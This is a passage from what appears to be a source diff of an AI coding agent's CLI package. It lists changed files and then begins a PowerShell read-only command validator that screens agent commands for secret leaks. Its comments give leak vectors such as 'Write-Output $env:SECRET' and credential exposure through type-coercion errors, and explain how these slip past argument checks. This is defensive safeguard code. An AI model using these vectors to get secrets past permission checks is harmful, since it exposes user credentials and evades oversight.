  1609. package/src/utils/concurrentSessions.js +179 -0
  1610. package/src/utils/config.js +1078 -0
  1611. package/src/utils/configConstants.js +18 -0
  1612. package/src/utils/contentArray.js +45 -0
  1613. package/src/utils/context.js +185 -0
  1614. package/src/utils/contextAnalysis.js +171 -0
  1615. package/src/utils/contextSuggestions.js +158 -0
  1616. package/src/utils/controlMessageCompat.js +31 -0
  1617. package/src/utils/conversationRecovery.js +434 -0
  1618. package/src/utils/cron.js +260 -0
  1619. package/src/utils/cronJitterConfig.js +62 -0
  1620. package/src/utils/cronScheduler.js +388 -0
  1621. package/src/utils/cronTasks.js +328 -0
  1622. package/src/utils/cronTasksLock.js +159 -0
  1623. package/src/utils/crossProjectResume.js +46 -0
  1624. package/src/utils/crypto.js +13 -0
  1625. package/src/utils/cwd.js +29 -0
  1626. package/src/utils/debug.js +220 -0
  1627. package/src/utils/debugFilter.js +125 -0
  1628. package/src/utils/deepLink/banner.js +103 -0
  1629. package/src/utils/deepLink/parseDeepLink.js +138 -0
  1630. package/src/utils/deepLink/protocolHandler.js +119 -0
  1631. package/src/utils/deepLink/registerProtocol.js +291 -0
  1632. package/src/utils/deepLink/terminalLauncher.js +455 -0
  1633. package/src/utils/deepLink/terminalPreference.js +51 -0
  1634. package/src/utils/desktopDeepLink.js +208 -0
  1635. package/src/utils/detectRepository.js +157 -0
  1636. package/src/utils/diagLogs.js +74 -0
  1637. package/src/utils/diff.js +108 -0
  1638. package/src/utils/directMemberMessage.js +34 -0
  1639. package/src/utils/displayTags.js +46 -0
  1640. package/src/utils/doctorContextWarnings.js +179 -0
  1641. package/src/utils/doctorDiagnostic.js +494 -0
  1642. package/src/utils/dxt/helpers.js +64 -0
  1643. package/src/utils/dxt/zip.js +167 -0
  1644. package/src/utils/earlyInput.js +166 -0
  1645. package/src/utils/editor.js +163 -0
  1646. package/src/utils/effort.js +271 -0
  1647. package/src/utils/embeddedTools.js +26 -0
  1648. package/src/utils/employeeChat.js +271 -0
  1649. package/src/utils/employeeDb.js +326 -0
  1650. package/src/utils/env.js +358 -0
  1651. package/src/utils/envDynamic.js +130 -0
  1652. package/src/utils/envUtils.js +161 -0
  1653. package/src/utils/envValidation.js +26 -0
  1654. package/src/utils/errorLogSink.js +196 -0
  1655. package/src/utils/errors.js +207 -0
  1656. package/src/utils/exampleCommands.js +165 -0
  1657. package/src/utils/execFileNoThrow.js +93 -0
  1658. package/src/utils/execFileNoThrowPortable.js +49 -0
  1659. package/src/utils/execSyncWrapper.js +6 -0
  1660. package/src/utils/exportRenderer.js +71 -0
  1661. package/src/utils/extraUsage.js +19 -0
  1662. package/src/utils/fastMode.js +393 -0
  1663. package/src/utils/file.js +467 -0
  1664. package/src/utils/fileHistory.js +851 -0
  1665. package/src/utils/fileOperationAnalytics.js +45 -0
  1666. package/src/utils/filePersistence/filePersistence.js +212 -0
  1667. package/src/utils/filePersistence/outputsScanner.js +104 -0
  1668. package/src/utils/filePersistence/types.js +4 -0
  1669. package/src/utils/fileRead.js +81 -0
  1670. package/src/utils/fileReadCache.js +78 -0
  1671. package/src/utils/fileStateCache.js +99 -0
  1672. package/src/utils/findExecutable.js +13 -0
  1673. package/src/utils/fingerprint.js +58 -0
  1674. package/src/utils/forkedAgent.js +410 -0
  1675. package/src/utils/format.js +238 -0
  1676. package/src/utils/formatBriefTimestamp.js +72 -0
  1677. package/src/utils/fpsTracker.js +34 -0
  1678. package/src/utils/frontmatterParser.js +260 -0
  1679. package/src/utils/fsOperations.js +555 -0
  1680. package/src/utils/fullscreen.js +194 -0
  1681. package/src/utils/generatedFiles.js +122 -0
  1682. package/src/utils/generators.js +67 -0
  1683. package/src/utils/genericProcessUtils.js +155 -0
  1684. package/src/utils/getWorktreePaths.js +56 -0
  1685. package/src/utils/getWorktreePathsPortable.js +23 -0
  1686. package/src/utils/ghPrStatus.js +71 -0
  1687. package/src/utils/git/gitConfigParser.js +226 -0
  1688. package/src/utils/git/gitFilesystem.js +606 -0
  1689. package/src/utils/git/gitignore.js +84 -0
  1690. package/src/utils/git.js +725 -0
  1691. package/src/utils/gitDiff.js +395 -0
  1692. package/src/utils/gitSettings.js +18 -0
  1693. package/src/utils/github/ghAuthStatus.js +23 -0
  1694. package/src/utils/githubRepoPathMapping.js +135 -0
  1695. package/src/utils/glob.js +90 -0
  1696. package/src/utils/gracefulShutdown.js +447 -0
  1697. package/src/utils/groupToolUses.js +126 -0
  1698. package/src/utils/handlePromptSubmit.js +398 -0
  1699. package/src/utils/hash.js +44 -0
  1700. package/src/utils/headlessProfiler.js +147 -0
  1701. package/src/utils/heapDumpService.js +201 -0
  1702. package/src/utils/heatmap.js +151 -0
  1703. package/src/utils/highlightMatch.js +29 -0
  1704. package/src/utils/hooks/AsyncHookRegistry.js +187 -0
  1705. package/src/utils/hooks/apiQueryHookHelper.js +77 -0
  1706. package/src/utils/hooks/execAgentHook.js +257 -0
  1707. package/src/utils/hooks/execHttpHook.js +184 -0
  1708. package/src/utils/hooks/execPromptHook.js +171 -0
  1709. package/src/utils/hooks/fileChangedWatcher.js +161 -0
  1710. package/src/utils/hooks/hookEvents.js +111 -0
  1711. package/src/utils/hooks/hookHelpers.js +60 -0
  1712. package/src/utils/hooks/hooksConfigManager.js +323 -0
  1713. package/src/utils/hooks/hooksConfigSnapshot.js +114 -0
  1714. package/src/utils/hooks/hooksSettings.js +204 -0
  1715. package/src/utils/hooks/postSamplingHooks.js +39 -0
  1716. package/src/utils/hooks/registerFrontmatterHooks.js +47 -0
  1717. package/src/utils/hooks/registerSkillHooks.js +40 -0
  1718. package/src/utils/hooks/sessionHooks.js +252 -0
  1719. package/src/utils/hooks/skillImprovement.js +211 -0
  1720. package/src/utils/hooks/ssrfGuard.js +258 -0
  1721. package/src/utils/hooks.js +3668 -0
  1722. package/src/utils/horizontalScroll.js +108 -0
  1723. package/src/utils/http.js +120 -0
  1724. package/src/utils/hyperlink.js +28 -0
  1725. package/src/utils/iTermBackup.js +48 -0
  1726. package/src/utils/ide.js +1195 -0
  1727. package/src/utils/idePathConversion.js +66 -0
  1728. package/src/utils/idleTimeout.js +44 -0
  1729. package/src/utils/imagePaste.js +343 -0
  1730. package/src/utils/imageResizer.js +664 -0
  1731. package/src/utils/imageStore.js +150 -0
  1732. package/src/utils/imageValidation.js +92 -0
  1733. package/src/utils/immediateCommand.js +12 -0
  1734. package/src/utils/inProcessTeammateHelpers.js +71 -0
  1735. package/src/utils/ink.js +20 -0
  1736. package/src/utils/intl.js +83 -0
  1737. package/src/utils/jetbrains.js +152 -0
  1738. package/src/utils/json.js +231 -0
  1739. package/src/utils/jsonRead.js +14 -0
  1740. package/src/utils/keyboardShortcuts.js +11 -0
  1741. package/src/utils/lazySchema.js +8 -0
  1742. package/src/utils/listSessionsImpl.js +332 -0
  1743. package/src/utils/localInstaller.js +130 -0
  1744. package/src/utils/lockfile.js +30 -0
  1745. package/src/utils/log.js +280 -0
  1746. package/src/utils/logoV2Utils.js +256 -0
  1747. package/src/utils/mailbox.js +50 -0
  1748. package/src/utils/managedEnv.js +160 -0
  1749. package/src/utils/managedEnvConstants.js +185 -0
  1750. package/src/utils/markdown.js +315 -0
  1751. package/src/utils/markdownConfigLoader.js +480 -0
  1752. package/src/utils/mcp/dateTimeParser.js +102 -0
  1753. package/src/utils/mcp/elicitationValidation.js +259 -0
  1754. package/src/utils/mcpInstructionsDelta.js +97 -0
  1755. package/src/utils/mcpOutputStorage.js +159 -0
  1756. package/src/utils/mcpValidation.js +165 -0
  1757. package/src/utils/mcpWebSocketTransport.js +180 -0
  1758. package/src/utils/memoize.js +205 -0
  1759. package/src/utils/memory/types.js +9 -0
  1760. package/src/utils/memory/versions.js +7 -0
  1761. package/src/utils/memoryFileDetection.js +245 -0
  1762. package/src/utils/messagePredicates.js +6 -0
  1763. package/src/utils/messageQueueManager.js +430 -0
  1764. package/src/utils/messages/mappers.js +240 -0
  1765. package/src/utils/messages/systemInit.js +72 -0
  1766. package/src/utils/messages.js +4286 -0
  1767. package/src/utils/model/agent.js +128 -0
  1768. package/src/utils/model/aliases.js +21 -0
  1769. package/src/utils/model/antModels.js +25 -0
  1770. package/src/utils/model/bedrock.js +220 -0
  1771. package/src/utils/model/check1mAccess.js +64 -0
  1772. package/src/utils/model/configs.js +86 -0
  1773. package/src/utils/model/contextWindowUpgradeCheck.js +41 -0
  1774. package/src/utils/model/deprecation.js +72 -0
  1775. package/src/utils/model/model.js +533 -0
  1776. package/src/utils/model/modelAllowlist.js +148 -0
  1777. package/src/utils/model/modelCapabilities.js +105 -0
  1778. package/src/utils/model/modelOptions.js +450 -0
  1779. package/src/utils/model/modelStrings.js +144 -0
  1780. package/src/utils/model/modelSupportOverrides.js +40 -0
  1781. package/src/utils/model/providers.js +35 -0
  1782. package/src/utils/model/validateModel.js +131 -0
  1783. package/src/utils/modelCost.js +160 -0
  1784. package/src/utils/modifiers.js +39 -0
  1785. package/src/utils/mtls.js +132 -0
  1786. package/src/utils/nativeInstaller/download.js +370 -0
  1787. package/src/utils/nativeInstaller/index.js +8 -0
  1788. package/src/utils/nativeInstaller/installer.js +1395 -0
  1789. package/src/utils/nativeInstaller/packageManagers.js +258 -0
  1790. package/src/utils/nativeInstaller/pidLock.js +347 -0
  1791. package/src/utils/notebook.js +176 -0
  1792. package/src/utils/objectGroupBy.js +15 -0
  1793. package/src/utils/pasteStore.js +93 -0
  1794. package/src/utils/path.js +140 -0
  1795. package/src/utils/pdf.js +236 -0
  1796. package/src/utils/pdfUtils.js +61 -0
  1797. package/src/utils/peerAddress.js +20 -0
  1798. package/src/utils/permissions/PermissionMode.js +95 -0
  1799. package/src/utils/permissions/PermissionPromptToolResultSchema.js +85 -0
  1800. package/src/utils/permissions/PermissionResult.js +11 -0
  1801. package/src/utils/permissions/PermissionRule.js +19 -0
  1802. package/src/utils/permissions/PermissionUpdate.js +268 -0
  1803. package/src/utils/permissions/PermissionUpdateSchema.js +61 -0
  1804. package/src/utils/permissions/autoModeState.js +31 -0
  1805. package/src/utils/permissions/bashClassifier.js +30 -0
  1806. package/src/utils/permissions/bypassPermissionsKillswitch.js +115 -0
  1807. package/src/utils/permissions/classifierDecision.js +86 -0
  1808. package/src/utils/permissions/classifierShared.js +28 -0
  1809. package/src/utils/permissions/dangerousPatterns.js +78 -0
  1810. package/src/utils/permissions/denialTracking.js +34 -0
  1811. package/src/utils/permissions/filesystem.js +1411 -0
  1812. package/src/utils/permissions/getNextPermissionMode.js +74 -0
  1813. package/src/utils/permissions/pathValidation.js +351 -0
  1814. package/src/utils/permissions/permissionExplainer.js +188 -0
  1815. package/src/utils/permissions/permissionRuleParser.js +175 -0
  1816. package/src/utils/permissions/permissionSetup.js +1162 -0
  1817. package/src/utils/permissions/permissions.js +1063 -0
  1818. package/src/utils/permissions/permissionsLoader.js +217 -0
  1819. package/src/utils/permissions/shadowedRuleDetection.js +149 -0
  1820. package/src/utils/permissions/shellRuleMatching.js +174 -0
  1821. package/src/utils/permissions/yoloClassifier.js +1193 -0
  1822. package/src/utils/planModeV2.js +75 -0
  1823. package/src/utils/plans.js +334 -0
  1824. package/src/utils/platform.js +122 -0
  1825. package/src/utils/plugins/addDirPluginSettings.js +53 -0
  1826. package/src/utils/plugins/cacheUtils.js +174 -0
  1827. package/src/utils/plugins/dependencyResolver.js +244 -0
  1828. package/src/utils/plugins/fetchTelemetry.js +108 -0
  1829. package/src/utils/plugins/gitAvailability.js +65 -0
  1830. package/src/utils/plugins/headlessPluginInstall.js +136 -0
  1831. package/src/utils/plugins/hintRecommendation.js +136 -0
  1832. package/src/utils/plugins/installCounts.js +221 -0
  1833. package/src/utils/plugins/installedPluginsManager.js +1003 -0
  1834. package/src/utils/plugins/loadPluginAgents.js +219 -0
  1835. package/src/utils/plugins/loadPluginCommands.js +595 -0
  1836. package/src/utils/plugins/loadPluginHooks.js +239 -0
  1837. package/src/utils/plugins/loadPluginOutputStyles.js +112 -0
  1838. package/src/utils/plugins/lspPluginIntegration.js +293 -0
  1839. package/src/utils/plugins/lspRecommendation.js +278 -0
  1840. package/src/utils/plugins/managedPlugins.js +26 -0
  1841. package/src/utils/plugins/marketplaceHelpers.js +470 -0
  1842. package/src/utils/plugins/marketplaceManager.js +1939 -0
  1843. package/src/utils/plugins/mcpPluginIntegration.js +465 -0
  1844. package/src/utils/plugins/mcpbHandler.js +708 -0
  1845. package/src/utils/plugins/officialMarketplace.js +19 -0
  1846. package/src/utils/plugins/officialMarketplaceGcs.js +202 -0
  1847. package/src/utils/plugins/officialMarketplaceStartupCheck.js +344 -0
  1848. package/src/utils/plugins/orphanedPluginFilter.js +96 -0
  1849. package/src/utils/plugins/parseMarketplaceInput.js +143 -0
  1850. package/src/utils/plugins/performStartupChecks.js +66 -0
  1851. package/src/utils/plugins/pluginAutoupdate.js +210 -0
  1852. package/src/utils/plugins/pluginBlocklist.js +93 -0
  1853. package/src/utils/plugins/pluginDirectories.js +170 -0
  1854. package/src/utils/plugins/pluginFlagging.js +173 -0
  1855. package/src/utils/plugins/pluginIdentifier.js +78 -0
  1856. package/src/utils/plugins/pluginInstallationHelpers.js +400 -0
  1857. package/src/utils/plugins/pluginLoader.js +2426 -0
  1858. package/src/utils/plugins/pluginOptionsStorage.js +311 -0
  1859. package/src/utils/plugins/pluginPolicy.js +18 -0
  1860. package/src/utils/plugins/pluginStartupCheck.js +261 -0
  1861. package/src/utils/plugins/pluginVersioning.js +128 -0
  1862. package/src/utils/plugins/reconciler.js +181 -0
  1863. package/src/utils/plugins/refresh.js +162 -0
  1864. package/src/utils/plugins/schemas.js +1283 -0
  1865. package/src/utils/plugins/validatePlugin.js +765 -0
  1866. package/src/utils/plugins/walkPluginMarkdown.js +49 -0
  1867. package/src/utils/plugins/zipCache.js +346 -0
  1868. package/src/utils/plugins/zipCacheAdapters.js +133 -0
  1869. package/src/utils/powershell/dangerousCmdlets.js +174 -0
  1870. package/src/utils/powershell/parser.js +1357 -0
  1871. package/src/utils/powershell/staticPrefix.js +277 -0
  1872. package/src/utils/preflightChecks.js +147 -0
  1873. package/src/utils/privacyLevel.js +49 -0
  1874. package/src/utils/process.js +56 -0
  1875. package/src/utils/processUserInput/processBashCommand.js +118 -0
  1876. package/src/utils/processUserInput/processSlashCommand.js +845 -0
  1877. package/src/utils/processUserInput/processTextPrompt.js +68 -0
  1878. package/src/utils/processUserInput/processUserInput.js +344 -0
  1879. package/src/utils/profilerBase.js +32 -0
  1880. package/src/utils/promptCategory.js +39 -0
  1881. package/src/utils/promptEditor.js +151 -0
  1882. package/src/utils/promptShellExecution.js +117 -0
  1883. package/src/utils/protectedNamespace.js +4 -0
  1884. package/src/utils/proxy.js +345 -0
  1885. package/src/utils/queryContext.js +110 -0
  1886. package/src/utils/queryHelpers.js +436 -0
  1887. package/src/utils/queryProfiler.js +242 -0
  1888. package/src/utils/queueProcessor.js +70 -0
  1889. package/src/utils/readEditContext.js +176 -0
  1890. package/src/utils/readFileInRange.js +278 -0
  1891. package/src/utils/releaseNotes.js +307 -0
  1892. package/src/utils/renderOptions.js +67 -0
  1893. package/src/utils/ripgrep.js +521 -0
  1894. package/src/utils/sandbox/sandbox-adapter.js +750 -0
  1895. package/src/utils/sandbox/sandbox-ui-utils.js +11 -0
  1896. package/src/utils/sanitization.js +72 -0
  1897. package/src/utils/screenshotClipboard.js +89 -0
  1898. package/src/utils/sdkEventQueue.js +49 -0
  1899. package/src/utils/secureStorage/fallbackStorage.js +59 -0
  1900. package/src/utils/secureStorage/index.js +13 -0
  1901. package/src/utils/secureStorage/keychainPrefetch.js +91 -0
  1902. package/src/utils/secureStorage/macOsKeychainHelpers.js +91 -0
  1903. package/src/utils/secureStorage/macOsKeychainStorage.js +192 -0
  1904. package/src/utils/secureStorage/plainTextStorage.js +81 -0
  1905. package/src/utils/semanticBoolean.js +23 -0
  1906. package/src/utils/semanticNumber.js +34 -0
  1907. package/src/utils/semver.js +51 -0
  1908. package/src/utils/sequential.js +43 -0
  1909. package/src/utils/sessionActivity.js +120 -0
  1910. package/src/utils/sessionEnvVars.js +18 -0
  1911. package/src/utils/sessionEnvironment.js +131 -0
  1912. package/src/utils/sessionFileAccessHooks.js +205 -0
  1913. package/src/utils/sessionIngressAuth.js +113 -0
  1914. package/src/utils/sessionRestore.js +357 -0
  1915. package/src/utils/sessionStart.js +165 -0
  1916. package/src/utils/sessionState.js +76 -0
  1917. package/src/utils/sessionStorage.js +4162 -0
  1918. package/src/utils/sessionStoragePortable.js +665 -0
  1919. package/src/utils/sessionTitle.js +120 -0
  1920. package/src/utils/sessionUrl.js +50 -0
  1921. package/src/utils/set.js +50 -0
  1922. package/src/utils/settings/allErrors.js +29 -0
  1923. package/src/utils/settings/applySettingsChange.js +65 -0
  1924. package/src/utils/settings/changeDetector.js +409 -0
  1925. package/src/utils/settings/constants.js +166 -0
  1926. package/src/utils/settings/internalWrites.js +33 -0
  1927. package/src/utils/settings/managedPath.js +29 -0
  1928. package/src/utils/settings/mdm/constants.js +62 -0
  1929. package/src/utils/settings/mdm/rawRead.js +97 -0
  1930. package/src/utils/settings/mdm/settings.js +254 -0
  1931. package/src/utils/settings/permissionValidation.js +224 -0
  1932. package/src/utils/settings/pluginOnlyPolicy.js +53 -0
  1933. package/src/utils/settings/schemaOutput.js +7 -0
  1934. package/src/utils/settings/settings.js +791 -0
  1935. package/src/utils/settings/settingsCache.js +47 -0
  1936. package/src/utils/settings/toolValidationConfig.js +76 -0
  1937. package/src/utils/settings/types.js +846 -0
  1938. package/src/utils/settings/validateEditTool.js +34 -0
  1939. package/src/utils/settings/validation.js +192 -0
  1940. package/src/utils/settings/validationTips.js +111 -0
  1941. package/src/utils/shell/bashProvider.js +202 -0
  1942. package/src/utils/shell/outputLimits.js +7 -0
  1943. package/src/utils/shell/powershellDetection.js +96 -0
  1944. package/src/utils/shell/powershellProvider.js +104 -0
  1945. package/src/utils/shell/prefix.js +246 -0
  1946. package/src/utils/shell/readOnlyCommandValidation.js +1776 -0
  1947. package/src/utils/shell/resolveDefaultShell.js +13 -0
  1948. package/src/utils/shell/shellProvider.js +2 -0
  1949. package/src/utils/shell/shellToolUtils.js +21 -0
  1950. package/src/utils/shell/specPrefix.js +198 -0
  1951. package/src/utils/shellConfig.js +136 -0
  1952. package/src/utils/sideQuery.js +134 -0
  1953. package/src/utils/sideQuestion.js +121 -0
  1954. package/src/utils/signal.js +34 -0
  1955. package/src/utils/sinks.js +15 -0
  1956. package/src/utils/skills/skillChangeDetector.js +264 -0
  1957. package/src/utils/slashCommandParsing.js +46 -0
  1958. package/src/utils/sleep.js +72 -0
  1959. package/src/utils/sliceAnsi.js +74 -0
  1960. package/src/utils/slowOperations.js +216 -0
  1961. package/src/utils/standaloneAgent.js +20 -0
  1962. package/src/utils/startupProfiler.js +149 -0
  1963. package/src/utils/staticRender.js +104 -0
  1964. package/src/utils/stats.js +802 -0
  1965. package/src/utils/statsCache.js +330 -0
  1966. package/src/utils/status.js +359 -0
  1967. package/src/utils/statusNoticeDefinitions.js +123 -0
  1968. package/src/utils/statusNoticeHelpers.js +15 -0
  1969. package/src/utils/stream.js +73 -0
  1970. package/src/utils/streamJsonStdoutGuard.js +107 -0
  1971. package/src/utils/streamlinedTransform.js +162 -0
  1972. package/src/utils/stringUtils.js +202 -0
  1973. package/src/utils/subprocessEnv.js +87 -0
  1974. package/src/utils/suggestions/commandSuggestions.js +458 -0
  1975. package/src/utils/suggestions/directoryCompletion.js +191 -0
  1976. package/src/utils/suggestions/shellHistoryCompletion.js +95 -0
  1977. package/src/utils/suggestions/skillUsageTracking.js +50 -0
  1978. package/src/utils/suggestions/slackChannelSuggestions.js +169 -0
  1979. package/src/utils/swarm/It2SetupPrompt.js +386 -0
  1980. package/src/utils/swarm/backends/ITermBackend.js +276 -0
  1981. package/src/utils/swarm/backends/InProcessBackend.js +237 -0
  1982. package/src/utils/swarm/backends/PaneBackendExecutor.js +250 -0
  1983. package/src/utils/swarm/backends/TmuxBackend.js +574 -0
  1984. package/src/utils/swarm/backends/detection.js +112 -0
  1985. package/src/utils/swarm/backends/it2Setup.js +185 -0
  1986. package/src/utils/swarm/backends/registry.js +369 -0
  1987. package/src/utils/swarm/backends/teammateModeSnapshot.js +68 -0
  1988. package/src/utils/swarm/backends/types.js +9 -0
  1989. package/src/utils/swarm/constants.js +29 -0
  1990. package/src/utils/swarm/inProcessRunner.js +1021 -0
  1991. package/src/utils/swarm/leaderPermissionBridge.js +31 -0
  1992. package/src/utils/swarm/permissionSync.js +667 -0
  1993. package/src/utils/swarm/reconnection.js +82 -0
  1994. package/src/utils/swarm/spawnInProcess.js +218 -0
  1995. package/src/utils/swarm/spawnUtils.js +123 -0
  1996. package/src/utils/swarm/teamHelpers.js +484 -0
  1997. package/src/utils/swarm/teammateInit.js +87 -0
  1998. package/src/utils/swarm/teammateLayoutManager.js +82 -0
  1999. package/src/utils/swarm/teammateModel.js +9 -0
  2000. package/src/utils/swarm/teammatePromptAddendum.js +17 -0
  2001. package/src/utils/systemDirectories.js +51 -0
  2002. package/src/utils/systemPrompt.js +88 -0
  2003. package/src/utils/systemPromptType.js +9 -0
  2004. package/src/utils/systemTheme.js +108 -0
  2005. package/src/utils/taggedId.js +49 -0
  2006. package/src/utils/task/TaskOutput.js +320 -0
  2007. package/src/utils/task/diskOutput.js +387 -0
  2008. package/src/utils/task/framework.js +236 -0
  2009. package/src/utils/task/outputFormatting.js +24 -0
  2010. package/src/utils/task/sdkProgress.js +24 -0
  2011. package/src/utils/taskSummary.js +3 -0
  2012. package/src/utils/tasks.js +672 -0
  2013. package/src/utils/teamDiscovery.js +48 -0
  2014. package/src/utils/teamMemoryOps.js +67 -0
  2015. package/src/utils/teammate.js +237 -0
  2016. package/src/utils/teammateContext.js +56 -0
  2017. package/src/utils/teammateMailbox.js +793 -0
  2018. package/src/utils/telemetry/betaSessionTracing.js +25 -0
  2019. package/src/utils/telemetry/bigqueryExporter.js +17 -0
  2020. package/src/utils/telemetry/events.js +7 -0
  2021. package/src/utils/telemetry/instrumentation.js +16 -0
  2022. package/src/utils/telemetry/logger.js +25 -0
  2023. package/src/utils/telemetry/perfettoTracing.js +882 -0
  2024. package/src/utils/telemetry/pluginTelemetry.js +76 -0
  2025. package/src/utils/telemetry/sessionTracing.js +62 -0
  2026. package/src/utils/telemetry/skillLoadedEvent.js +4 -0
  2027. package/src/utils/telemetryAttributes.js +56 -0
  2028. package/src/utils/teleport/api.js +299 -0
  2029. package/src/utils/teleport/environmentSelection.js +55 -0
  2030. package/src/utils/teleport/environments.js +84 -0
  2031. package/src/utils/teleport/gitBundle.js +192 -0
  2032. package/src/utils/teleport.js +1047 -0
  2033. package/src/utils/tempfile.js +26 -0
  2034. package/src/utils/terminal.js +105 -0
  2035. package/src/utils/terminalPanel.js +155 -0
  2036. package/src/utils/textHighlighting.js +113 -0
  2037. package/src/utils/thaddeusHints.js +142 -0
  2038. package/src/utils/theme.js +525 -0
  2039. package/src/utils/thinking.js +130 -0
  2040. package/src/utils/timeouts.js +35 -0
  2041. package/src/utils/tmuxSocket.js +373 -0
  2042. package/src/utils/todo/types.js +9 -0
  2043. package/src/utils/tokenBudget.js +62 -0
  2044. package/src/utils/tokens.js +223 -0
  2045. package/src/utils/toolErrors.js +101 -0
  2046. package/src/utils/toolPool.js +61 -0
  2047. package/src/utils/toolResultStorage.js +768 -0
  2048. package/src/utils/toolSchemaCache.js +7 -0
  2049. package/src/utils/toolSearch.js +551 -0
  2050. package/src/utils/transcriptSearch.js +200 -0
  2051. package/src/utils/treeify.js +111 -0
  2052. package/src/utils/truncate.js +164 -0
  2053. package/src/utils/udsClient.js +5 -0
  2054. package/src/utils/udsMessaging.js +23 -0
  2055. package/src/utils/ultraplan/ccrSession.js +264 -0
  2056. package/src/utils/ultraplan/keyword.js +122 -0
  2057. package/src/utils/unaryLogging.js +16 -0
  2058. package/src/utils/undercover.js +89 -0
  2059. package/src/utils/user.js +137 -0
  2060. package/src/utils/userAgent.js +9 -0
  2061. package/src/utils/userPromptKeywords.js +21 -0
  2062. package/src/utils/uuid.js +22 -0
  2063. package/src/utils/warningHandler.js +97 -0
  2064. package/src/utils/which.js +75 -0
  2065. package/src/utils/windowsPaths.js +146 -0
  2066. package/src/utils/withResolvers.js +13 -0
  2067. package/src/utils/words.js +793 -0
  2068. package/src/utils/workforceIntent.js +192 -0
  2069. package/src/utils/workloadContext.js +42 -0
  2070. package/src/utils/worktree.js +1142 -0
  2071. package/src/utils/worktreeModeEnabled.js +11 -0
  2072. package/src/utils/xdg.js +52 -0
  2073. package/src/utils/xml.js +15 -0
  2074. package/src/utils/yaml.js +14 -0
  2075. package/src/utils/zodToJsonSchema.js +19 -0
  2076. package/src/vim/motions.js +73 -0
  2077. package/src/vim/operators.js +401 -0
  2078. package/src/vim/textObjects.js +153 -0
  2079. package/src/vim/transitions.js +340 -0
  2080. package/src/vim/types.js +93 -0
  2081. package/src/voice/voiceModeEnabled.js +20 -0
  2082. package/thaddeus-terminal.ts +401 -3
@@ -0,0 +1,1633 @@
1
+ /**
2
+ * PowerShell read-only command validation.
3
+ *
4
+ * Cmdlets are case-insensitive; all matching is done in lowercase.
5
+ */
6
+ import { getPlatform } from '../../utils/platform.js';
7
+ import { COMMON_ALIASES, deriveSecurityFlags, getPipelineSegments, isNullRedirectionTarget, isPowerShellParameter, } from '../../utils/powershell/parser.js';
8
+ import { DOCKER_READ_ONLY_COMMANDS, EXTERNAL_READONLY_COMMANDS, GH_READ_ONLY_COMMANDS, GIT_READ_ONLY_COMMANDS, validateFlags, } from '../../utils/shell/readOnlyCommandValidation.js';
9
+ import { COMMON_PARAMETERS } from './commonParameters.js';
10
+ const DOTNET_READ_ONLY_FLAGS = new Set([
11
+ '--version',
12
+ '--info',
13
+ '--list-runtimes',
14
+ '--list-sdks',
15
+ ]);
16
+ /**
17
+ * Shared callback for cmdlets that print or coerce their args to stdout/
18
+ * stderr. `Write-Output $env:SECRET` prints it directly; `Start-Sleep
19
+ * $env:SECRET` leaks via type-coerce error ("Cannot convert value 'sk-...'
20
+ * to System.Double"). Bash's echo regex WHITELISTS safe chars per token.
21
+ *
22
+ * Two checks:
23
+ * 1. elementTypes whitelist — StringConstant (literals) + Parameter (flag
24
+ * names). Rejects Variable, Other (HashtableAst/ConvertExpressionAst/
25
+ * BinaryExpressionAst all map to Other), ScriptBlock, SubExpression,
26
+ * ExpandableString. Same pattern as SAFE_PATH_ELEMENT_TYPES.
27
+ * 2. Colon-bound parameter value — `-InputObject:$env:SECRET` creates a
28
+ * SINGLE CommandParameterAst; the VariableExpressionAst is its .Argument
29
+ * child, not a separate CommandElement. elementTypes = [..., 'Parameter'],
30
+ * whitelist passes. Query children[] for the .Argument's mapped type;
31
+ * anything other than StringConstant (Variable, ParenExpression wrapping
32
+ * arbitrary pipelines, Hashtable, etc.) is a leak vector.
33
+ */
34
+ export function argLeaksValue(_cmd, element) {
35
+ const argTypes = (element?.elementTypes ?? []).slice(1);
36
+ const args = element?.args ?? [];
37
+ const children = element?.children;
38
+ for (let i = 0; i < argTypes.length; i++) {
39
+ if (argTypes[i] !== 'StringConstant' && argTypes[i] !== 'Parameter') {
40
+ // ArrayLiteralAst (`Select-Object Name, Id`) maps to 'Other' — the
41
+ // parse script only populates children for CommandParameterAst.Argument,
42
+ // so we can't inspect elements. Fall back to string-archaeology on the
43
+ // extent text: Hashtable has `@{`, ParenExpr has `(`, variables have
44
+ // `$`, type literals have `[`, scriptblocks have `{`. A comma-list of
45
+ // bare identifiers has none. `Name, $x` still rejects on `$`.
46
+ if (!/[$(@{[]/.test(args[i] ?? '')) {
47
+ continue;
48
+ }
49
+ return true;
50
+ }
51
+ if (argTypes[i] === 'Parameter') {
52
+ const paramChildren = children?.[i];
53
+ if (paramChildren) {
54
+ if (paramChildren.some(c => c.type !== 'StringConstant')) {
55
+ return true;
56
+ }
57
+ }
58
+ else {
59
+ // Fallback: string-archaeology on arg text (pre-children parsers).
60
+ // Reject `$` (variable), `(` (ParenExpressionAst), `@` (hash/array
61
+ // sub), `{` (scriptblock), `[` (type literal/static method).
62
+ const arg = args[i] ?? '';
63
+ const colonIdx = arg.indexOf(':');
64
+ if (colonIdx > 0 && /[$(@{[]/.test(arg.slice(colonIdx + 1))) {
65
+ return true;
66
+ }
67
+ }
68
+ }
69
+ }
70
+ return false;
71
+ }
72
+ /**
73
+ * Allowlist of PowerShell cmdlets that are considered read-only.
74
+ * Each cmdlet maps to its configuration including safe flags.
75
+ *
76
+ * Note: PowerShell cmdlets are case-insensitive, so we store keys in lowercase
77
+ * and normalize input for matching.
78
+ *
79
+ * Uses Object.create(null) to prevent prototype-chain pollution — attacker-
80
+ * controlled command names like 'constructor' or '__proto__' must return
81
+ * undefined, not inherited Object.prototype properties. Same defense as
82
+ * COMMON_ALIASES in parser.ts.
83
+ */
84
+ export const CMDLET_ALLOWLIST = Object.assign(Object.create(null), {
85
+ // =========================================================================
86
+ // PowerShell Cmdlets - Filesystem (read-only)
87
+ // =========================================================================
88
+ 'get-childitem': {
89
+ safeFlags: [
90
+ '-Path',
91
+ '-LiteralPath',
92
+ '-Filter',
93
+ '-Include',
94
+ '-Exclude',
95
+ '-Recurse',
96
+ '-Depth',
97
+ '-Name',
98
+ '-Force',
99
+ '-Attributes',
100
+ '-Directory',
101
+ '-File',
102
+ '-Hidden',
103
+ '-ReadOnly',
104
+ '-System',
105
+ ],
106
+ },
107
+ 'get-content': {
108
+ safeFlags: [
109
+ '-Path',
110
+ '-LiteralPath',
111
+ '-TotalCount',
112
+ '-Head',
113
+ '-Tail',
114
+ '-Raw',
115
+ '-Encoding',
116
+ '-Delimiter',
117
+ '-ReadCount',
118
